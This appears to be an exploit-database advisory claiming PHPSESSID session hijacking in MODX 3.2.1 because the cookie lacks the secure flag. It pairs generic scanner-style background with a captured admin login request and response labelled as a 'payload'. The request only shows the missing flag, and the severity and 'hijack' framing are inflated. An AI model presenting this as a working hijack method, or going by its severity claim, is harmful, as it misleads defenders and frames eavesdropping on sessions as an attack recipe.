## https://sploitus.com/exploit?id=PACKETSTORM:225289
# Titles: MODX.3.2.1 TLS cookie without secure flag set - COOKIE PHPSESSID
HIJACK
# Author: nu11secur1ty
# Date: 7/7/2026
# Vendor: https://modx.com/
# Software:
https://modx.com/download/subscribe?dlid=a1c54aa8-d971-4cd4-a279-340f6e806706&skip=1
# Reference:
https://portswigger.net/kb/issues/00500200_tls-cookie-without-secure-flag-set
## Description:
The following cookie was issued by the application and does not have the
secure flag set:
- PHPSESSID
The cookie appears to contain a session token, which may increase the risk
associated with this issue. You should review the contents of the cookie to
determine its function.
- Issue background
If the secure flag is set on a cookie, then browsers will not submit the
cookie in any requests that use an unencrypted HTTP connection, thereby
preventing the cookie from being trivially intercepted by an attacker
monitoring network traffic. If the secure flag is not set, then the cookie
will be transmitted in clear-text if the user visits any HTTP URLs within
the cookie's scope. An attacker may be able to induce this event by feeding
a user suitable links, either directly or via another web site. Even if the
domain that issued the cookie does not host any content that is accessed
over HTTP, an attacker may be able to use links of the form
http://example.com:443/ to perform the same attack.
To exploit this vulnerability, an attacker must be suitably positioned to
eavesdrop on the victim's network traffic. This scenario typically occurs
when a client communicates with the server over an insecure connection such
as public Wi-Fi, or a corporate or home network that is shared with a
compromised computer. Common defenses such as switched networks are not
sufficient to prevent this. An attacker situated in the user's ISP or the
application's hosting infrastructure could also perform this attack. Note
that an advanced adversary could potentially target any connection made
over the Internet's core infrastructure.
STATUS: MEDIUM - HIGH
[+]Payload:
```
POST /modx-3.2.1-pl/manager/ HTTP/1.1
Host: pwnedhost.com
Cache-Control: max-age=0
Sec-CH-UA: "Chromium";v="146", "Not;A=Brand";v="24", "Google Chrome";v="146"
Sec-CH-UA-Mobile: ?0
Sec-CH-UA-Platform: "Windows"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=8dbn1cfe2h5l4p85ntknpqqh5k
Origin: https://pwnedhost.com
Upgrade-Insecure-Requests: 1
Referer: https://pwnedhost.com/modx-3.2.1-pl/manager/
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
login_context=mgr&modhash=&returnUrl=%2Fmodx-3.2.1-pl%2Fmanager%2F&username=admin&password=password&rememberme=1&login=1
```
[+]Response:
```
HTTP/1.1 302 Found
Date: Tue, 07 Jul 2026 12:29:09 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=kcdesvjuvt21ha9vq2c0l25gla; expires=Tue, 14 Jul 2026
12:29:09 GMT; Max-Age=604800; path=/modx-3.2.1-pl/; HttpOnly
Location: https://pwnedhost.com/modx-3.2.1-pl/manager
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
```
# Exploit video:
[href](https://www.patreon.com/nu11secur1ty/posts/modx-3-2-1-tls-163149077)
# Time spent:
01:47:00